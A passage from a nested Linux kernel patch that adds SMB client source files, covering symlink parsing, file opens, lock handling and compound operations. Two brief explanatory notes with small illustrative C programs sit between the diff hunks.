++	} else if (S_ISBLK(mode)) {
++		memcpy(pdev->type, "IntxBLK", 8);
++		pdev->major = cpu_to_le64(MAJOR(dev));
++		pdev->minor = cpu_to_le64(MINOR(dev));
++		rc = tcon->ses->server->ops->sync_write(xid, &fid, &io_parms,
++							&bytes_written, iov, 1);
++	}
++	tcon->ses->server->ops->close(xid, tcon, &fid);
++	d_drop(dentry);
++
++	/* FIXME: add code here to set EAs */
++
++	cifs_free_open_info(&buf);
++	return rc;
++}
++
++struct smb_version_operations smb1_operations = {
++	.send_cancel = send_nt_cancel,
++	.compare_fids = cifs_compare_fids,
++	.setup_request = cifs_setup_request,
++	.setup_async_request = cifs_setup_async_request,
++	.check_receive = cifs_check_receive,
++	.add_credits = cifs_add_credits,
++	.set_credits = cifs_set_credits,
++	.get_credits_field = cifs_get_credits_field,
++	.get_credits = cifs_get_credits,
++	.wait_mtu_credits = cifs_wait_mtu_credits,
++	.get_next_mid = cifs_get_next_mid,
++	.read_data_offset = cifs_read_data_offset,
++	.read_data_length = cifs_read_data_length,
++	.map_error = map_smb_to_linux_error,
++	.find_mid = cifs_find_mid,
++	.check_message = checkSMB,
++	.dump_detail = cifs_dump_detail,
++	.clear_stats = cifs_clear_stats,
++	.print_stats = cifs_print_stats,
++	.is_oplock_break = is_valid_oplock_break,
++	.downgrade_oplock = cifs_downgrade_oplock,
++	.check_trans2 = cifs_check_trans2,
++	.need_neg = cifs_need_neg,
++	.negotiate = cifs_negotiate,
++	.negotiate_wsize = cifs_negotiate_wsize,
++	.negotiate_rsize = cifs_negotiate_rsize,
++	.sess_setup = CIFS_SessSetup,
++	.logoff = CIFSSMBLogoff,
++	.tree_connect = CIFSTCon,
++	.tree_disconnect = CIFSSMBTDis,
++	.get_dfs_refer = CIFSGetDFSRefer,
++	.qfs_tcon = cifs_qfs_tcon,
++	.is_path_accessible = cifs_is_path_accessible,
++	.can_echo = cifs_can_echo,
++	.query_path_info = cifs_query_path_info,
++	.query_file_info = cifs_query_file_info,
++	.get_srv_inum = cifs_get_srv_inum,
++	.set_path_size = CIFSSMBSetEOF,
++	.set_file_size = CIFSSMBSetFileSize,
++	.set_file_info = smb_set_file_info,
++	.set_compression = cifs_set_compression,
++	.echo = CIFSSMBEcho,
++	.mkdir = CIFSSMBMkDir,
++	.mkdir_setinfo = cifs_mkdir_setinfo,
++	.rmdir = CIFSSMBRmDir,
++	.unlink = CIFSSMBDelFile,
++	.rename_pending_delete = cifs_rename_pending_delete,
++	.rename = CIFSSMBRename,
++	.create_hardlink = CIFSCreateHardLink,
++	.query_symlink = cifs_query_symlink,
++	.open = cifs_open_file,
++	.set_fid = cifs_set_fid,
++	.close = cifs_close_file,
++	.flush = cifs_flush_file,
++	.async_readv = cifs_async_readv,
++	.async_writev = cifs_async_writev,
++	.sync_read = cifs_sync_read,
++	.sync_write = cifs_sync_write,
++	.query_dir_first = cifs_query_dir_first,
++	.query_dir_next = cifs_query_dir_next,
++	.close_dir = cifs_close_dir,
++	.calc_smb_size = smbCalcSize,
++	.oplock_response = cifs_oplock_response,
++	.queryfs = cifs_queryfs,
++	.mand_lock = cifs_mand_lock,
++	.mand_unlock_range = cifs_unlock_range,
++	.push_mand_locks = cifs_push_mandatory_locks,
++	.query_mf_symlink = cifs_query_mf_symlink,
++	.create_mf_symlink = cifs_create_mf_symlink,
++	.is_read_op = cifs_is_read_op,
++	.wp_retry_size = cifs_wp_retry_size,
++	.dir_needs_close = cifs_dir_needs_close,
++	.select_sectype = cifs_select_sectype,
++#ifdef CONFIG_CIFS_XATTR
++	.query_all_EAs = CIFSSMBQAllEAs,
++	.set_EA = CIFSSMBSetEA,
++#endif /* CIFS_XATTR */
++	.get_acl = get_cifs_acl,
++	.get_acl_by_fid = get_cifs_acl_by_fid,
++	.set_acl = set_cifs_acl,
++	.make_node = cifs_make_node,
++};
++
++struct smb_version_values smb1_values = {
++	.version_string = SMB1_VERSION_STRING,
++	.protocol_id = SMB10_PROT_ID,
++	.large_lock_type = LOCKING_ANDX_LARGE_FILES,
++	.exclusive_lock_type = 0,
++	.shared_lock_type = LOCKING_ANDX_SHARED_LOCK,
++	.unlock_lock_type = 0,
++	.header_preamble_size = 4,
++	.header_size = sizeof(struct smb_hdr),
++	.max_header_size = MAX_CIFS_HDR_SIZE,
++	.read_rsp_size = sizeof(READ_RSP),
++	.lock_cmd = cpu_to_le16(SMB_COM_LOCKING_ANDX),
++	.cap_unix = CAP_UNIX,
++	.cap_nt_find = CAP_NT_SMBS | CAP_NT_FIND,
++	.cap_large_files = CAP_LARGE_FILES,
++	.signing_enabled = SECMODE_SIGN_ENABLED,
++	.signing_required = SECMODE_SIGN_REQUIRED,
++};
+diff --git a/fs/smb/client/smb2file.c b/fs/smb/client/smb2file.c
+new file mode 100644
+index 0000000000000..ba6cc50af390f
+--- /dev/null
++++ b/fs/smb/client/smb2file.c
+@@ -0,0 +1,371 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   Copyright (C) International Business Machines  Corp., 2002, 2011
++ *   Author(s): Steve French (sfrench@us.ibm.com),
++ *              Pavel Shilovsky (pshilovsky@samba.org) 2012
++ *
++ */
++#include <linux/fs.h>
++#include <linux/stat.h>
++#include <linux/slab.h>
++#include <linux/pagemap.h>
++#include <asm/div64.h>
++#include "cifsfs.h"
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "cifs_debug.h"
++#include "cifs_fs_sb.h"
++#include "cifs_unicode.h"
++#include "fscache.h"
++#include "smb2proto.h"
++#include "smb2status.h"
++
++static struct smb2_symlink_err_rsp *symlink_data(const struct kvec *iov)
++{
++	struct smb2_err_rsp *err = iov->iov_base;
++	struct smb2_symlink_err_rsp *sym = ERR_PTR(-EINVAL);
++	u32 len;
++
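++	/*
++	 * Two server layouts are handled here: newer servers wrap the
++	 * symlink error response in one or more SMB2 error contexts, which
++	 * are walked below looking for SMB2_ERROR_ID_DEFAULT, while older
++	 * servers place a bare smb2_symlink_err_rsp directly in ErrorData.
++	 */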
++	if (err->ErrorContextCount) {
++		struct smb2_error_context_rsp *p, *end;
++
++		len = (u32)err->ErrorContextCount * (offsetof(struct smb2_error_context_rsp,
++							      ErrorContextData) +
++						     sizeof(struct smb2_symlink_err_rsp));
++		if (le32_to_cpu(err->ByteCount) < len || iov->iov_len < len + sizeof(*err))
++			return ERR_PTR(-EINVAL);
++
++		p = (struct smb2_error_context_rsp *)err->ErrorData;
++		end = (struct smb2_error_context_rsp *)((u8 *)err + iov->iov_len);
++		do {
++			if (le32_to_cpu(p->ErrorId) == SMB2_ERROR_ID_DEFAULT) {
++				sym = (struct smb2_symlink_err_rsp *)&p->ErrorContextData;
++				break;
++			}
++			cifs_dbg(FYI, "%s: skipping unhandled error context: 0x%x\n",
++				 __func__, le32_to_cpu(p->ErrorId));
++
++			len = ALIGN(le32_to_cpu(p->ErrorDataLength), 8);
++			p = (struct smb2_error_context_rsp *)((u8 *)&p->ErrorContextData + len);
++		} while (p < end);
++	} else if (le32_to_cpu(err->ByteCount) >= sizeof(*sym) &&
++		   iov->iov_len >= SMB2_SYMLINK_STRUCT_SIZE) {
++		sym = (struct smb2_symlink_err_rsp *)err->ErrorData;
++	}
++
++	if (!IS_ERR(sym) && (le32_to_cpu(sym->SymLinkErrorTag) != SYMLINK_ERROR_TAG ||
++			     le32_to_cpu(sym->ReparseTag) != IO_REPARSE_TAG_SYMLINK))
++		sym = ERR_PTR(-EINVAL);
++
++	return sym;
++}
++
++int smb2_parse_symlink_response(struct cifs_sb_info *cifs_sb, const struct kvec *iov, char **path)
++{
++	struct smb2_symlink_err_rsp *sym;
++	unsigned int sub_offs, sub_len;
++	unsigned int print_offs, print_len;
++	char *s;
++
++	if (!cifs_sb || !iov || !iov->iov_base || !iov->iov_len || !path)
++		return -EINVAL;
++
++	sym = symlink_data(iov);
++	if (IS_ERR(sym))
++		return PTR_ERR(sym);
++
++	sub_len = le16_to_cpu(sym->SubstituteNameLength);
++	sub_offs = le16_to_cpu(sym->SubstituteNameOffset);
++	print_len = le16_to_cpu(sym->PrintNameLength);
++	print_offs = le16_to_cpu(sym->PrintNameOffset);
++
++	if (iov->iov_len < SMB2_SYMLINK_STRUCT_SIZE + sub_offs + sub_len ||
++	    iov->iov_len < SMB2_SYMLINK_STRUCT_SIZE + print_offs + print_len)
++		return -EINVAL;
++
++	s = cifs_strndup_from_utf16((char *)sym->PathBuffer + sub_offs, sub_len, true,
++				    cifs_sb->local_nls);
++	if (!s)
++		return -ENOMEM;
++	convert_delimiter(s, '/');
++	cifs_dbg(FYI, "%s: symlink target: %s\n", __func__, s);
++
++	*path = s;
++	return 0;
++}
++
++int smb2_open_file(const unsigned int xid, struct cifs_open_parms *oparms, __u32 *oplock, void *buf)
++{
++	int rc;
++	__le16 *smb2_path;
++	__u8 smb2_oplock;
++	struct cifs_open_info_data *data = buf;
++	struct smb2_file_all_info file_info = {};
++	struct smb2_file_all_info *smb2_data = data ? &file_info : NULL;
++	struct kvec err_iov = {};
++	int err_buftype = CIFS_NO_BUFFER;
++	struct cifs_fid *fid = oparms->fid;
++	struct network_resiliency_req nr_ioctl_req;
++
++	smb2_path = cifs_convert_path_to_utf16(oparms->path, oparms->cifs_sb);
++	if (smb2_path == NULL)
++		return -ENOMEM;
++
++	oparms->desired_access |= FILE_READ_ATTRIBUTES;
++	smb2_oplock = SMB2_OPLOCK_LEVEL_BATCH;
++
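++	/*
++	 * If the server stops the open at a symlink, the error response
++	 * carries the link target; it is parsed below and the open is
++	 * retried with OPEN_REPARSE_POINT so the reparse point itself is
++	 * opened instead.
++	 */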
++	rc = SMB2_open(xid, oparms, smb2_path, &smb2_oplock, smb2_data, NULL, &err_iov,
++		       &err_buftype);
++	if (rc && data) {
++		struct smb2_hdr *hdr = err_iov.iov_base;
++
++		if (unlikely(!err_iov.iov_base || err_buftype == CIFS_NO_BUFFER))
++			goto out;
++		if (hdr->Status == STATUS_STOPPED_ON_SYMLINK) {
++			rc = smb2_parse_symlink_response(oparms->cifs_sb, &err_iov,
++							 &data->symlink_target);
++			if (!rc) {
++				memset(smb2_data, 0, sizeof(*smb2_data));
++				oparms->create_options |= OPEN_REPARSE_POINT;
++				rc = SMB2_open(xid, oparms, smb2_path, &smb2_oplock, smb2_data,
++					       NULL, NULL, NULL);
++				oparms->create_options &= ~OPEN_REPARSE_POINT;
++			}
++		}
++	}
++
++	if (rc)
++		goto out;
++
++	if (oparms->tcon->use_resilient) {
++		/* default timeout is 0, servers pick default (120 seconds) */
++		nr_ioctl_req.Timeout =
++			cpu_to_le32(oparms->tcon->handle_timeout);
++		nr_ioctl_req.Reserved = 0;
++		rc = SMB2_ioctl(xid, oparms->tcon, fid->persistent_fid,
++			fid->volatile_fid, FSCTL_LMR_REQUEST_RESILIENCY,
++			(char *)&nr_ioctl_req, sizeof(nr_ioctl_req),
++			CIFSMaxBufSize, NULL, NULL /* no return info */);
++		if (rc == -EOPNOTSUPP) {
++			cifs_dbg(VFS,
++			     "resiliency not supported by server, disabling\n");
++			oparms->tcon->use_resilient = false;
++		} else if (rc)
++			cifs_dbg(FYI, "error %d setting resiliency\n", rc);
++
++		rc = 0;
++	}
++
++	if (smb2_data) {
++		/* if open response does not have IndexNumber field - get it */
++		if (smb2_data->IndexNumber == 0) {
++			rc = SMB2_get_srv_num(xid, oparms->tcon,
++				      fid->persistent_fid,
++				      fid->volatile_fid,
++				      &smb2_data->IndexNumber);
++			if (rc) {
++				/*
++				 * let get_inode_info disable server inode
++				 * numbers
++				 */
++				smb2_data->IndexNumber = 0;
++				rc = 0;
++			}
++		}
++		memcpy(&data->fi, smb2_data, sizeof(data->fi));
++	}
++
++	*oplock = smb2_oplock;
++out:
++	free_rsp_buf(err_buftype, err_iov.iov_base);
++	kfree(smb2_path);
++	return rc;
++}
++
++int
++smb2_unlock_range(struct cifsFileInfo *cfile, struct file_lock *flock,
++		  const unsigned int xid)
++{
++	int rc = 0, stored_rc;
++	unsigned int max_num, num = 0, max_buf;
++	struct smb2_lock_element *buf, *cur;
++	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
++	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
++	struct cifsLockInfo *li, *tmp;
++	__u64 length = 1 + flock->fl_end - flock->fl_start;
++	struct list_head tmp_llist;
++
++	INIT_LIST_HEAD(&tmp_llist);
++
++	/*
++	 * Accessing maxBuf is racy with cifs_reconnect - need to store value
++	 * and check it before using.
++	 */
++	max_buf = tcon->ses->server->maxBuf;
++	if (max_buf < sizeof(struct smb2_lock_element))
++		return -EINVAL;
++
++	BUILD_BUG_ON(sizeof(struct smb2_lock_element) > PAGE_SIZE);
++	max_buf = min_t(unsigned int, max_buf, PAGE_SIZE);
++	max_num = max_buf / sizeof(struct smb2_lock_element);
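++	/*
++	 * For illustration (sizes hypothetical): with PAGE_SIZE = 4096 and
++	 * a 24-byte smb2_lock_element, up to 170 unlock elements are
++	 * batched into each SMB2_LOCK request issued below.
++	 */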
++	buf = kcalloc(max_num, sizeof(struct smb2_lock_element), GFP_KERNEL);
++	if (!buf)
++		return -ENOMEM;
++
++	cur = buf;
++
++	cifs_down_write(&cinode->lock_sem);
++	list_for_each_entry_safe(li, tmp, &cfile->llist->locks, llist) {
++		if (flock->fl_start > li->offset ||
++		    (flock->fl_start + length) <
++		    (li->offset + li->length))
++			continue;
++		if (current->tgid != li->pid)
++			/*
++			 * flock and OFD lock are associated with an open
++			 * file description, not the process.
++			 */
++			if (!(flock->fl_flags & (FL_FLOCK | FL_OFDLCK)))
++				continue;
++		if (cinode->can_cache_brlcks) {
++			/*
++			 * We can cache brlock requests - simply remove a lock
++			 * from the file's list.
++			 */
++			list_del(&li->llist);
++			cifs_del_lock_waiters(li);
++			kfree(li);
++			continue;
++		}
++		cur->Length = cpu_to_le64(li->length);
++		cur->Offset = cpu_to_le64(li->offset);
++		cur->Flags = cpu_to_le32(SMB2_LOCKFLAG_UNLOCK);
++		/*
++		 * We need to save a lock here to let us add it again to the
++		 * file's list if the unlock range request fails on the server.
++		 */
++		list_move(&li->llist, &tmp_llist);
++		if (++num == max_num) {
++			stored_rc = smb2_lockv(xid, tcon,
++					       cfile->fid.persistent_fid,
++					       cfile->fid.volatile_fid,
++					       current->tgid, num, buf);
++			if (stored_rc) {
++				/*
++				 * We failed on the unlock range request - add
++				 * all locks from the tmp list to the head of
++				 * the file's list.
++				 */
++				cifs_move_llist(&tmp_llist,
++						&cfile->llist->locks);
++				rc = stored_rc;
++			} else
++				/*
++				 * The unlock range request succeeded - free the
++				 * tmp list.
++				 */
++				cifs_free_llist(&tmp_llist);
++			cur = buf;
++			num = 0;
++		} else
++			cur++;
++	}
++	if (num) {
++		stored_rc = smb2_lockv(xid, tcon, cfile->fid.persistent_fid,
++				       cfile->fid.volatile_fid, current->tgid,
++				       num, buf);
++		if (stored_rc) {
++			cifs_move_llist(&tmp_llist, &cfile->llist->locks);
++			rc = stored_rc;
++		} else
++			cifs_free_llist(&tmp_llist);
++	}
++	up_write(&cinode->lock_sem);
++
++	kfree(buf);
++	return rc;
++}
++
++static int
++smb2_push_mand_fdlocks(struct cifs_fid_locks *fdlocks, const unsigned int xid,
++		       struct smb2_lock_element *buf, unsigned int max_num)
++{
++	int rc = 0, stored_rc;
++	struct cifsFileInfo *cfile = fdlocks->cfile;
++	struct cifsLockInfo *li;
++	unsigned int num = 0;
++	struct smb2_lock_element *cur = buf;
++	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
++
++	list_for_each_entry(li, &fdlocks->locks, llist) {
++		cur->Length = cpu_to_le64(li->length);
++		cur->Offset = cpu_to_le64(li->offset);
++		cur->Flags = cpu_to_le32(li->type |
++						SMB2_LOCKFLAG_FAIL_IMMEDIATELY);
++		if (++num == max_num) {
++			stored_rc = smb2_lockv(xid, tcon,
++					       cfile->fid.persistent_fid,
++					       cfile->fid.volatile_fid,
++					       current->tgid, num, buf);
++			if (stored_rc)
++				rc = stored_rc;
++			cur = buf;
++			num = 0;
++		} else
++			cur++;
++	}
++	if (num) {
++		stored_rc = smb2_lockv(xid, tcon,
++				       cfile->fid.persistent_fid,
++				       cfile->fid.volatile_fid,
++				       current->tgid, num, buf);
++		if (stored_rc)
++			rc = stored_rc;
++	}
++
++	return rc;
++}
++
++int
++smb2_push_mandatory_locks(struct cifsFileInfo *cfile)
++{
++	int rc = 0, stored_rc;
++	unsigned int xid;
++	unsigned int max_num, max_buf;
++	struct smb2_lock_element *buf;
++	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
++	struct cifs_fid_locks *fdlocks;
++
++	xid = get_xid();
++
++	/*
++	 * Accessing maxBuf is racy with cifs_reconnect - need to store value
++	 * and check it for zero before using.
++	 */
++	max_buf = tlink_tcon(cfile->tlink)->ses->server->maxBuf;
++	if (max_buf < sizeof(struct smb2_lock_element)) {
++		free_xid(xid);
++		return -EINVAL;
++	}
++
++	BUILD_BUG_ON(sizeof(struct smb2_lock_element) > PAGE_SIZE);
++	max_buf = min_t(unsigned int, max_buf, PAGE_SIZE);
++	max_num = max_buf / sizeof(struct smb2_lock_element);
++	buf = kcalloc(max_num, sizeof(struct smb2_lock_element), GFP_KERNEL);
++	if (!buf) {
++		free_xid(xid);
++		return -ENOMEM;
++	}
++
++	list_for_each_entry(fdlocks, &cinode->llist, llist) {
++		stored_rc = smb2_push_mand_fdlocks(fdlocks, xid, buf, max_num);
++		if (stored_rc)
++			rc = stored_rc;
++	}
++
++	kfree(buf);
++	free_xid(xid);
++	return rc;
++}
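
Both lock-pushing helpers use the same stored_rc/rc error-aggregation idiom:
keep iterating after a failure and report a non-zero status at the end. A tiny
self-contained illustration (do_item is a made-up stand-in):

#include <stdio.h>

static int do_item(int i)
{
	return (i == 2) ? -5 : 0;	/* pretend item 2 fails (-EIO) */
}

int main(void)
{
	int i, rc = 0, stored_rc;

	for (i = 0; i < 5; i++) {
		stored_rc = do_item(i);
		if (stored_rc)
			rc = stored_rc;	/* remember the error, keep going */
	}
	printf("final rc=%d\n", rc);	/* -5: the failure is not lost */
	return 0;
}
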
+diff --git a/fs/smb/client/smb2glob.h b/fs/smb/client/smb2glob.h
+new file mode 100644
+index 0000000000000..82e916ad167c0
+--- /dev/null
++++ b/fs/smb/client/smb2glob.h
+@@ -0,0 +1,44 @@
++/* SPDX-License-Identifier: LGPL-2.1 */
++/*
++ *
++ *   Definitions for various global variables and structures
++ *
++ *   Copyright (C) International Business Machines  Corp., 2002, 2011
++ *                 Etersoft, 2012
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *              Jeremy Allison (jra@samba.org)
++ *              Pavel Shilovsky (pshilovsky@samba.org) 2012
++ *
++ */
++#ifndef _SMB2_GLOB_H
++#define _SMB2_GLOB_H
++
++/*
++ *****************************************************************
++ * Constants go here
++ *****************************************************************
++ */
++
++/*
++ * Identifiers for functions that use the open, operation, close pattern
++ * in smb2inode.c:smb2_compound_op()
++ */
++#define SMB2_OP_SET_DELETE 1
++#define SMB2_OP_SET_INFO 2
++#define SMB2_OP_QUERY_INFO 3
++#define SMB2_OP_QUERY_DIR 4
++#define SMB2_OP_MKDIR 5
++#define SMB2_OP_RENAME 6
++#define SMB2_OP_DELETE 7
++#define SMB2_OP_HARDLINK 8
++#define SMB2_OP_SET_EOF 9
++#define SMB2_OP_RMDIR 10
++#define SMB2_OP_POSIX_QUERY_INFO 11
++
++/* Used when constructing chained read requests. */
++#define CHAINED_REQUEST 1
++#define START_OF_CHAIN 2
++#define END_OF_CHAIN 4
++#define RELATED_REQUEST 8
++
++#endif	/* _SMB2_GLOB_H */
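
These SMB2_OP_* values select a branch inside the compound-op worker added in
smb2inode.c below. A minimal sketch of that command-code dispatch, with local
copies of a few values purely for illustration:

#include <stdio.h>

enum compound_op { OP_MKDIR = 5, OP_RENAME = 6, OP_DELETE = 7 };

static const char *op_name(enum compound_op op)
{
	switch (op) {
	case OP_MKDIR:	return "mkdir";
	case OP_RENAME:	return "rename";
	case OP_DELETE:	return "delete";
	default:	return "invalid";	/* mirrors the -EINVAL default */
	}
}

int main(void)
{
	printf("%s\n", op_name(OP_RENAME));
	return 0;
}
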
+diff --git a/fs/smb/client/smb2inode.c b/fs/smb/client/smb2inode.c
+new file mode 100644
+index 0000000000000..c97e049e29dd3
+--- /dev/null
++++ b/fs/smb/client/smb2inode.c
+@@ -0,0 +1,799 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   Copyright (C) International Business Machines  Corp., 2002, 2011
++ *                 Etersoft, 2012
++ *   Author(s): Pavel Shilovsky (pshilovsky@samba.org),
++ *              Steve French (sfrench@us.ibm.com)
++ *
++ */
++#include <linux/fs.h>
++#include <linux/stat.h>
++#include <linux/slab.h>
++#include <linux/pagemap.h>
++#include <asm/div64.h>
++#include "cifsfs.h"
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "cifs_debug.h"
++#include "cifs_fs_sb.h"
++#include "cifs_unicode.h"
++#include "fscache.h"
++#include "smb2glob.h"
++#include "smb2pdu.h"
++#include "smb2proto.h"
++#include "cached_dir.h"
++#include "smb2status.h"
++
++static void
++free_set_inf_compound(struct smb_rqst *rqst)
++{
++	if (rqst[1].rq_iov)
++		SMB2_set_info_free(&rqst[1]);
++	if (rqst[2].rq_iov)
++		SMB2_close_free(&rqst[2]);
++}
++
++struct cop_vars {
++	struct cifs_open_parms oparms;
++	struct kvec rsp_iov[3];
++	struct smb_rqst rqst[3];
++	struct kvec open_iov[SMB2_CREATE_IOV_SIZE];
++	struct kvec qi_iov[1];
++	struct kvec si_iov[SMB2_SET_INFO_IOV_SIZE];
++	struct kvec close_iov[1];
++	struct smb2_file_rename_info rename_info;
++	struct smb2_file_link_info link_info;
++};
++
++/*
++ * note: If cfile is passed, the reference to it is dropped here.
++ * So make sure that you do not reuse cfile after return from this func.
++ *
++ * If @err_iov and @err_buftype are passed, make sure both are large enough (>= 3) to hold all
++ * error responses.  The caller is also responsible for freeing them.
++ */
++static int smb2_compound_op(const unsigned int xid, struct cifs_tcon *tcon,
++			    struct cifs_sb_info *cifs_sb, const char *full_path,
++			    __u32 desired_access, __u32 create_disposition, __u32 create_options,
++			    umode_t mode, void *ptr, int command, struct cifsFileInfo *cfile,
++			    struct kvec *err_iov, int *err_buftype)
++{
++	struct cop_vars *vars = NULL;
++	struct kvec *rsp_iov;
++	struct smb_rqst *rqst;
++	int rc;
++	__le16 *utf16_path = NULL;
++	__u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
++	struct cifs_fid fid;
++	struct cifs_ses *ses = tcon->ses;
++	struct TCP_Server_Info *server;
++	int num_rqst = 0;
++	int resp_buftype[3];
++	struct smb2_query_info_rsp *qi_rsp = NULL;
++	struct cifs_open_info_data *idata;
++	int flags = 0;
++	__u8 delete_pending[8] = {1, 0, 0, 0, 0, 0, 0, 0};
++	unsigned int size[2];
++	void *data[2];
++	int len;
++
++	vars = kzalloc(sizeof(*vars), GFP_ATOMIC);
++	if (vars == NULL)
++		return -ENOMEM;
++	rqst = &vars->rqst[0];
++	rsp_iov = &vars->rsp_iov[0];
++
++	server = cifs_pick_channel(ses);
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	resp_buftype[0] = resp_buftype[1] = resp_buftype[2] = CIFS_NO_BUFFER;
++
++	/* We already have a handle so we can skip the open */
++	if (cfile)
++		goto after_open;
++
++	/* Open */
++	utf16_path = cifs_convert_path_to_utf16(full_path, cifs_sb);
++	if (!utf16_path) {
++		rc = -ENOMEM;
++		goto finished;
++	}
++
++	vars->oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.path = full_path,
++		.desired_access = desired_access,
++		.disposition = create_disposition,
++		.create_options = cifs_create_options(cifs_sb, create_options),
++		.fid = &fid,
++		.mode = mode,
++		.cifs_sb = cifs_sb,
++	};
++
++	rqst[num_rqst].rq_iov = &vars->open_iov[0];
++	rqst[num_rqst].rq_nvec = SMB2_CREATE_IOV_SIZE;
++	rc = SMB2_open_init(tcon, server,
++			    &rqst[num_rqst], &oplock, &vars->oparms,
++			    utf16_path);
++	kfree(utf16_path);
++	if (rc)
++		goto finished;
++
++	smb2_set_next_command(tcon, &rqst[num_rqst]);
++ after_open:
++	num_rqst++;
++	rc = 0;
++
++	/* Operation */
++	switch (command) {
++	case SMB2_OP_QUERY_INFO:
++		rqst[num_rqst].rq_iov = &vars->qi_iov[0];
++		rqst[num_rqst].rq_nvec = 1;
++
++		if (cfile)
++			rc = SMB2_query_info_init(tcon, server,
++				&rqst[num_rqst],
++				cfile->fid.persistent_fid,
++				cfile->fid.volatile_fid,
++				FILE_ALL_INFORMATION,
++				SMB2_O_INFO_FILE, 0,
++				sizeof(struct smb2_file_all_info) +
++					  PATH_MAX * 2, 0, NULL);
++		else {
++			rc = SMB2_query_info_init(tcon, server,
++				&rqst[num_rqst],
++				COMPOUND_FID,
++				COMPOUND_FID,
++				FILE_ALL_INFORMATION,
++				SMB2_O_INFO_FILE, 0,
++				sizeof(struct smb2_file_all_info) +
++					  PATH_MAX * 2, 0, NULL);
++			if (!rc) {
++				smb2_set_next_command(tcon, &rqst[num_rqst]);
++				smb2_set_related(&rqst[num_rqst]);
++			}
++		}
++
++		if (rc)
++			goto finished;
++		num_rqst++;
++		trace_smb3_query_info_compound_enter(xid, ses->Suid, tcon->tid,
++						     full_path);
++		break;
++	case SMB2_OP_POSIX_QUERY_INFO:
++		rqst[num_rqst].rq_iov = &vars->qi_iov[0];
++		rqst[num_rqst].rq_nvec = 1;
++
++		if (cfile)
++			rc = SMB2_query_info_init(tcon, server,
++				&rqst[num_rqst],
++				cfile->fid.persistent_fid,
++				cfile->fid.volatile_fid,
++				SMB_FIND_FILE_POSIX_INFO,
++				SMB2_O_INFO_FILE, 0,
++				/* TBD: fix following to allow for longer SIDs */
++				sizeof(struct smb311_posix_qinfo *) + (PATH_MAX * 2) +
++				(sizeof(struct cifs_sid) * 2), 0, NULL);
++		else {
++			rc = SMB2_query_info_init(tcon, server,
++				&rqst[num_rqst],
++				COMPOUND_FID,
++				COMPOUND_FID,
++				SMB_FIND_FILE_POSIX_INFO,
++				SMB2_O_INFO_FILE, 0,
++				sizeof(struct smb311_posix_qinfo *) + (PATH_MAX * 2) +
++				(sizeof(struct cifs_sid) * 2), 0, NULL);
++			if (!rc) {
++				smb2_set_next_command(tcon, &rqst[num_rqst]);
++				smb2_set_related(&rqst[num_rqst]);
++			}
++		}
++
++		if (rc)
++			goto finished;
++		num_rqst++;
++		trace_smb3_posix_query_info_compound_enter(xid, ses->Suid, tcon->tid, full_path);
++		break;
++	case SMB2_OP_DELETE:
++		trace_smb3_delete_enter(xid, ses->Suid, tcon->tid, full_path);
++		break;
++	case SMB2_OP_MKDIR:
++		/*
++		 * Directories are created through parameters in the
++		 * SMB2_open() call.
++		 */
++		trace_smb3_mkdir_enter(xid, ses->Suid, tcon->tid, full_path);
++		break;
++	case SMB2_OP_RMDIR:
++		rqst[num_rqst].rq_iov = &vars->si_iov[0];
++		rqst[num_rqst].rq_nvec = 1;
++
++		size[0] = 1; /* sizeof(__u8); see MS-FSCC section 2.4.11 */
++		data[0] = &delete_pending[0];
++
++		rc = SMB2_set_info_init(tcon, server,
++					&rqst[num_rqst], COMPOUND_FID,
++					COMPOUND_FID, current->tgid,
++					FILE_DISPOSITION_INFORMATION,
++					SMB2_O_INFO_FILE, 0, data, size);
++		if (rc)
++			goto finished;
++		smb2_set_next_command(tcon, &rqst[num_rqst]);
++		smb2_set_related(&rqst[num_rqst++]);
++		trace_smb3_rmdir_enter(xid, ses->Suid, tcon->tid, full_path);
++		break;
++	case SMB2_OP_SET_EOF:
++		rqst[num_rqst].rq_iov = &vars->si_iov[0];
++		rqst[num_rqst].rq_nvec = 1;
++
++		size[0] = 8; /* sizeof __le64 */
++		data[0] = ptr;
++
++		if (cfile) {
++			rc = SMB2_set_info_init(tcon, server,
++						&rqst[num_rqst],
++						cfile->fid.persistent_fid,
++						cfile->fid.volatile_fid,
++						current->tgid,
++						FILE_END_OF_FILE_INFORMATION,
++						SMB2_O_INFO_FILE, 0,
++						data, size);
++		} else {
++			rc = SMB2_set_info_init(tcon, server,
++						&rqst[num_rqst],
++						COMPOUND_FID,
++						COMPOUND_FID,
++						current->tgid,
++						FILE_END_OF_FILE_INFORMATION,
++						SMB2_O_INFO_FILE, 0,
++						data, size);
++			if (!rc) {
++				smb2_set_next_command(tcon, &rqst[num_rqst]);
++				smb2_set_related(&rqst[num_rqst]);
++			}
++		}
++		if (rc)
++			goto finished;
++		num_rqst++;
++		trace_smb3_set_eof_enter(xid, ses->Suid, tcon->tid, full_path);
++		break;
++	case SMB2_OP_SET_INFO:
++		rqst[num_rqst].rq_iov = &vars->si_iov[0];
++		rqst[num_rqst].rq_nvec = 1;
++
++		size[0] = sizeof(FILE_BASIC_INFO);
++		data[0] = ptr;
++
++		if (cfile)
++			rc = SMB2_set_info_init(tcon, server,
++				&rqst[num_rqst],
++				cfile->fid.persistent_fid,
++				cfile->fid.volatile_fid, current->tgid,
++				FILE_BASIC_INFORMATION,
++				SMB2_O_INFO_FILE, 0, data, size);
++		else {
++			rc = SMB2_set_info_init(tcon, server,
++				&rqst[num_rqst],
++				COMPOUND_FID,
++				COMPOUND_FID, current->tgid,
++				FILE_BASIC_INFORMATION,
++				SMB2_O_INFO_FILE, 0, data, size);
++			if (!rc) {
++				smb2_set_next_command(tcon, &rqst[num_rqst]);
++				smb2_set_related(&rqst[num_rqst]);
++			}
++		}
++
++		if (rc)
++			goto finished;
++		num_rqst++;
++		trace_smb3_set_info_compound_enter(xid, ses->Suid, tcon->tid,
